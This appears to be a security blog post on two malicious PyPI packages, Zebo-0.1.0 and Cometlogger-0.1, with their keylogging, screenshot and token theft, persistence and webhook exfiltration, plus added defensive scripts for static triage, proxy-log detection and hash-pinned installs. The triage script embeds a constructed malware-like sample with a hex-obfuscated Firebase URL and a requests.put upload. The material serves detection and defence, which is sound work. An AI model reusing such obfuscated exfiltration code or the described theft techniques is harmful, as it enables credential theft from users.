Fortinet’s FortiGuard Labs has recently uncovered two highly malicious Python packages, Zebo-0.1.0 and Cometlogger-0.1, which serve as a sobering reminder of the evolving sophistication of cyber threats. These packages, discovered in November 2024, highlight the growing abuse of Python Package Index (PyPI) repositories to distribute malware disguised as legitimate software. This analysis provides cybersecurity professionals with a detailed understanding of their behavior, the associated risks, and actionable recommendations to mitigate these threats.
The Rise of Weaponized Python Code
Python's simplicity and extensive libraries have made it ubiquitous, and that same reach makes its ecosystem attractive to criminals. Malicious actors abuse open-source package registries, using obfuscation to hide harmful payloads inside code that looks legitimate. Fortinet's AI-driven open-source software (OSS) malware detection system identified these two packages, which were built for credential theft, covert surveillance, and data exfiltration.
Dissecting the Zebo-0.1.0 Package
The Zebo-0.1.0 package shows the hallmarks of purpose-built malware: it installs quietly and then combines several capabilities on the victim's machine. Its main tactics are:
- Obfuscation Techniques: Zebo-0.1.0 hides critical strings such as its server URL behind hexadecimal encoding. This defeats simple string matching and slows manual review, but it does not survive analysis that decodes the literals: the Python parser itself resolves \x escapes before the code runs, so any tool that inspects parsed constants sees the plain URL.
- Keylogging Capabilities: Using the pynput library, the malware records keystrokes, capturing passwords and other account credentials. The logs are stored locally and later uploaded to a remote Firebase database.
- Screen Capture and Data Exfiltration: The malware periodically takes screenshots of the victim's desktop and uploads them to a remote server. Uploaded files are then deleted from the victim's machine, so the stolen data leaves no obvious local trace.
- Persistence Mechanisms: Zebo-0.1.0 places a script in the Windows Startup folder so that it runs again at every user logon. The technique is simple, but it keeps the malware running across reboots, and non-technical users rarely look there when cleaning up.
The package transmits stolen data with HTTP PUT requests to a Firebase endpoint. Because the endpoint URL is hex-encoded in the source, a plain string search for the domain finds nothing; the URL only appears once the literal is decoded.
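As an added example (not Fortinet's tooling and not code from either package), the following script shows why hex encoding only hides strings from a text search: Python's parser resolves \x escapes before the code runs, and a literal passed to bytes.fromhex is just as easy to decode statically. It parses a package's source with the ast module, decodes such literals, and flags the indicators described above: keylogging and screenshot imports, Startup-folder references, URLs, and requests.put calls. The sample source, the domains in it and the indicator lists are constructed for the demonstration.

```python
"""Static triage of a Python package for Zebo-style indicators (added example)."""
import ast
import re
import textwrap

# Indicator lists based on the behaviour described in the article; the exact
# names are assumptions for this example, not Fortinet's detection rules.
SUSPICIOUS_MODULES = {"pynput", "PIL.ImageGrab", "pyautogui", "mss"}
URL_RE = re.compile(r"https?://[^\s'\"<>]+")


def hex_escape(text: str) -> str:
    """Obfuscate a string the way the article describes: each byte as \\xNN."""
    return "".join(f"\\x{b:02x}" for b in text.encode())


# Constructed sample source resembling the behaviour described; not real code.
EXFIL_URL = "https://example-app.firebaseio.com/keys.json"
BACKUP_URL = "https://backup.example.net/upload"
SAMPLE = textwrap.dedent('''
    import os
    from pynput import keyboard
    from PIL import ImageGrab
    import requests

    URL = "@HEX_ESCAPED@"
    BACKUP = bytes.fromhex("@HEX_DIGITS@").decode()
    STARTUP = os.path.join(os.getenv("APPDATA"), "Microsoft", "Windows",
                           "Start Menu", "Programs", "Startup")

    def upload(payload):
        requests.put(URL, json=payload)
''').replace("@HEX_ESCAPED@", hex_escape(EXFIL_URL)).replace(
    "@HEX_DIGITS@", BACKUP_URL.encode().hex())


def _scan_text(text: str, findings: dict) -> None:
    """Record URLs and Startup-folder references found in a decoded string."""
    findings["urls"].extend(URL_RE.findall(text))
    if "startup" in text.lower():
        findings["startup_refs"] += 1


def triage_source(src: str) -> dict:
    """Walk the AST. The parser has already decoded \\x escapes, and literal
    bytes.fromhex() arguments are decoded here, so hex hiding does not help."""
    findings = {"imports": [], "urls": [], "startup_refs": 0, "put_calls": 0}
    for node in ast.walk(ast.parse(src)):
        if isinstance(node, ast.Import):
            for alias in node.names:
                if alias.name.split(".")[0] in SUSPICIOUS_MODULES:
                    findings["imports"].append(alias.name)
        elif isinstance(node, ast.ImportFrom) and node.module:
            for alias in node.names:
                full = f"{node.module}.{alias.name}"
                if node.module.split(".")[0] in SUSPICIOUS_MODULES or full in SUSPICIOUS_MODULES:
                    findings["imports"].append(full)
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            _scan_text(node.value, findings)
        elif isinstance(node, ast.Call) and isinstance(node.func, ast.Attribute):
            if (node.func.attr == "fromhex" and node.args
                    and isinstance(node.args[0], ast.Constant)
                    and isinstance(node.args[0].value, str)):
                try:
                    _scan_text(bytes.fromhex(node.args[0].value).decode("latin-1"), findings)
                except ValueError:
                    pass  # not valid hex, nothing to decode
            elif (node.func.attr == "put" and isinstance(node.func.value, ast.Name)
                    and node.func.value.id == "requests"):
                findings["put_calls"] += 1
    return findings


def verdict(findings: dict) -> str:
    """Capture libraries plus an outbound upload path is the Zebo pattern."""
    captures = bool(findings["imports"])
    exfil = bool(findings["urls"]) or findings["put_calls"] > 0
    if captures and exfil:
        return "suspicious"
    return "review" if captures or exfil or findings["startup_refs"] else "clean"


if __name__ == "__main__":
    print("domain visible to a text search:", "firebaseio" in SAMPLE)
    result = triage_source(SAMPLE)
    print(result, verdict(result))
```

Run against a real package, the same walk would be applied to every .py file in the extracted sdist or wheel, including setup.py, since install-time code is where such payloads usually sit.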
Cometlogger-0.1: A Sophisticated Keylogger and Data Thief
Similar to Zebo-0.1.0, Cometlogger-0.1 demonstrates advanced malicious functionalities, though with additional features that pose significant threats to both individuals and organizations. Its key components include:
- Webhook Injection: A setup step prompts for a webhook URL and writes it into the malware's Python source files, so each copy reports to an endpoint chosen by whoever configured it. Stolen session tokens and cookies are sent to that webhook, and the same webhook channel serves as the command-and-control (C2) path for issuing commands.
- Information Theft: Cometlogger targets saved passwords, cookies, and browsing history from platforms like Instagram, Twitter, Discord, and TikTok. Cryptocurrency wallets are also a prime target, with the malware extracting wallet files from browser extensions and local storage.
- Anti-VM Detection: The malware includes virtualization detection mechanisms to identify if it is being analyzed in a sandbox or virtual machine environment. If detected, the malware terminates to avoid being studied.
- Fake Error Messages: The malware displays misleading error messages that prompt the user to run the script again, giving it further chances to execute on the victim's machine.
By employing asynchronous execution, Cometlogger is capable of exfiltrating large volumes of data efficiently. Furthermore, it uses techniques like file encryption and runtime dynamic modification to evade detection by security tools.
Risks and Indicators of Compromise (IOCs)
Both Zebo-0.1.0 and Cometlogger-0.1 present significant risks to users and organizations:
- Obfuscation and Data Theft: Obfuscation techniques not only conceal malicious behavior but also make detection challenging for antivirus solutions. The stolen data can lead to identity theft, financial fraud, or unauthorized access to sensitive corporate resources.
- Persistence and Scalability: Startup-folder persistence, together with the fake error messages that coax users into re-running the script, keeps these scripts operational over extended periods, increasing their cumulative impact.
Key IOCs (SHA-256):
- Zebo-0.1.0: 4aeb0211bd6d9e7c74c09ac67812465f2a8e90e25fe04b265b7f289deea5db21
- Cometlogger-0.1: 839d0cfcc52a130add70239b943d8c82c4234b064d6f996eeaae142f05cc9e85
Actionable Recommendations for Mitigation
For Detection:
- Antivirus Tools: Employ reputable security solutions capable of detecting obfuscated malware.
- Network Monitoring: Watch outbound traffic from developer workstations for unexpected HTTP PUT requests to Firebase endpoints, for uploads to webhook URLs, and for uploads that recur on a fixed interval, which is what periodic screenshot exfiltration looks like on the wire.
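To make the network-monitoring advice concrete, here is an added example (not from the article or from Fortinet) that runs simple detection logic over proxy log lines: it flags HTTP PUT requests to Firebase endpoints, any upload to a webhook-style URL, and repeated uploads from one client to one destination within a short window. The log format, IP addresses, hostnames and thresholds are constructed assumptions for the example.

```python
"""Proxy-log detection for Firebase and webhook exfiltration (added example)."""
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import urlsplit

# Assumed log format: "<ISO8601 UTC> <client ip> <method> <url> <status> <bytes>"
LOG_RE = re.compile(
    r"^(?P<ts>\S+) (?P<src>\S+) (?P<method>[A-Z]+) (?P<url>\S+) (?P<status>\d{3}) (?P<size>\d+)$"
)

# Constructed sample lines: 10.0.5.17 behaves like a Zebo victim, 10.0.5.22 like
# a Cometlogger victim, and the GET lines are ordinary pip traffic.
SAMPLE_LOG = """\
2024-11-20T10:15:02Z 10.0.5.17 PUT https://example-app.firebaseio.com/keys.json 200 4312
2024-11-20T10:15:40Z 10.0.5.17 GET https://pypi.org/simple/requests/ 200 18822
2024-11-20T10:20:03Z 10.0.5.17 PUT https://example-app.firebaseio.com/screens/1.json 200 311480
2024-11-20T10:25:01Z 10.0.5.17 PUT https://example-app.firebaseio.com/keys.json 200 2207
2024-11-20T10:26:14Z 10.0.5.22 POST https://hooks.example.net/api/webhooks/abc123 204 9180
2024-11-20T10:30:00Z 10.0.5.22 GET https://files.pythonhosted.org/packages/x.whl 200 52000
"""


def parse_line(line: str):
    """Return a dict for one log line, or None if it does not match the format."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%Y-%m-%dT%H:%M:%SZ")
    parts = urlsplit(rec["url"])
    rec["host"] = (parts.hostname or "").lower()
    rec["path"] = parts.path
    rec["size"] = int(rec["size"])
    return rec


def detect(lines, beacon_min: int = 3, window: timedelta = timedelta(minutes=15)):
    """Apply three rules and return a list of (rule, src, host) alerts."""
    alerts = []
    uploads = defaultdict(list)  # (src, host) -> timestamps of PUT/POST requests
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        # Rule 1: Zebo-style PUT to a Firebase Realtime Database endpoint.
        if rec["method"] == "PUT" and rec["host"].endswith(".firebaseio.com"):
            alerts.append(("firebase_put", rec["src"], rec["host"]))
        # Rule 2: Cometlogger-style upload to a webhook URL.
        if "webhook" in rec["path"].lower():
            alerts.append(("webhook_upload", rec["src"], rec["host"]))
        if rec["method"] in ("PUT", "POST"):
            uploads[(rec["src"], rec["host"])].append(rec["ts"])
    # Rule 3: beacon_min uploads from one client to one host inside the window,
    # the signature of periodic screenshot or keylog uploads.
    for (src, host), times in uploads.items():
        times.sort()
        for i in range(len(times) - beacon_min + 1):
            if times[i + beacon_min - 1] - times[i] <= window:
                alerts.append(("periodic_upload", src, host))
                break
    return alerts


def summarize(alerts):
    """Count alerts per rule, which is what a dashboard would show."""
    counts = defaultdict(int)
    for rule, _, _ in alerts:
        counts[rule] += 1
    return dict(counts)


if __name__ == "__main__":
    found = detect(SAMPLE_LOG.splitlines())
    for alert in found:
        print(alert)
    print(summarize(found))
```

Rule 1 and rule 2 are cheap string matches and will produce noise in shops that legitimately use Firebase or webhooks; rule 3 is the one worth tuning, because periodic uploads from a developer workstation to a single external host rarely have an innocent explanation.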
For Prevention:
- Code Review: Do not run third-party scripts or install packages without reviewing what they contain, including any code that executes at install time.
- User Education: Train employees to recognize phishing attempts and avoid interacting with unverified software.
- Secure Development Practices: Pull dependencies from trusted repositories, pin them to known versions and hashes, and run dependency scanners as part of the build.
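Pinning dependencies to hashes is the cheapest way to refuse an artifact nobody has reviewed. As an added example (not code from the article), the following script implements the same gate that pip applies with --require-hashes: it reads --hash=sha256: pins from a requirements file, hashes a downloaded artifact, and refuses it when the digest is on a block list such as the IOCs above or does not match a pin. The requirements text and artifact bytes are constructed for the example; the two block-list digests are the SHA-256 IOCs published in the article.

```python
"""Hash-pinned install gate (added example)."""
import hashlib
import re
from typing import Dict, Set

# The two SHA-256 IOCs published for the packages discussed above.
KNOWN_BAD = {
    "4aeb0211bd6d9e7c74c09ac67812465f2a8e90e25fe04b265b7f289deea5db21",  # Zebo-0.1.0
    "839d0cfcc52a130add70239b943d8c82c4234b064d6f996eeaae142f05cc9e85",  # Cometlogger-0.1
}

PIN_RE = re.compile(r"^(?P<name>[A-Za-z0-9_.-]+)==(?P<version>\S+)")
HASH_RE = re.compile(r"--hash=sha256:(?P<digest>[0-9a-f]{64})")


def parse_pins(requirements: str) -> Dict[str, Set[str]]:
    """Map 'name==version' to the set of sha256 digests pinned for it.

    Handles pip's convention of continuing a requirement with a trailing
    backslash so that several --hash values can be listed on separate lines.
    """
    pins: Dict[str, Set[str]] = {}
    for logical in requirements.replace("\\\n", " ").splitlines():
        logical = logical.split("#", 1)[0].strip()
        if not logical:
            continue
        m = PIN_RE.match(logical)
        if not m:
            raise ValueError(f"unpinned requirement: {logical!r}")
        key = f"{m['name'].lower()}=={m['version']}"
        pins[key] = {h["digest"] for h in HASH_RE.finditer(logical)}
        if not pins[key]:
            raise ValueError(f"requirement without --hash: {logical!r}")
    return pins


def classify_digest(requirement: str, digest: str, pins, known_bad=KNOWN_BAD) -> str:
    """Decide on a digest: block list first, then the pin for this requirement."""
    if digest in known_bad:
        return "blocked_ioc"
    pinned = pins.get(requirement.lower())
    if pinned is None:
        return "unpinned"
    return "ok" if digest in pinned else "hash_mismatch"


def check_artifact(requirement: str, data: bytes, pins, known_bad=KNOWN_BAD) -> str:
    """Hash a downloaded sdist or wheel and classify it."""
    return classify_digest(requirement, hashlib.sha256(data).hexdigest(), pins, known_bad)


# Constructed example artifacts and requirements file; the pinned digest is
# computed from these bytes, not taken from any real package.
GOOD_WHEEL = b"PK\x03\x04 constructed wheel contents for the demo"
TAMPERED_WHEEL = GOOD_WHEEL + b" plus an injected payload"
REQUIREMENTS = f"""\
# pinned by hash; install with: pip install --require-hashes -r requirements.txt
demo-lib==1.2.0 \\
    --hash=sha256:{hashlib.sha256(GOOD_WHEEL).hexdigest()}
"""


if __name__ == "__main__":
    pins = parse_pins(REQUIREMENTS)
    print(check_artifact("demo-lib==1.2.0", GOOD_WHEEL, pins))
    print(check_artifact("demo-lib==1.2.0", TAMPERED_WHEEL, pins))
```

The block list catches only the two known artifacts, so it is the pin check that does the real work: a re-uploaded or typosquatted package produces a different digest and is refused before any install-time code can run.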
The emergence of malicious packages such as Zebo-0.1.0 and Cometlogger-0.1 underscores the critical need for enhanced vigilance within the cybersecurity community. These Python-based threats highlight how attackers exploit open-source ecosystems to distribute malware, often targeting unsuspecting developers and users. By adopting a multi-pronged security approach that combines detection, prevention, and education, organizations can safeguard their systems and data from such evolving threats.
As the cybersecurity landscape continues to evolve, awareness and proactive measures will remain key to combating sophisticated adversaries. Let this case study serve as a reminder of the importance of securing development environments and scrutinizing third-party dependencies.
Information security specialist, currently working as risk infrastructure specialist & investigator.
15 years of experience in risk and control process, security audit support, business continuity design and support, workgroup management and information security standards.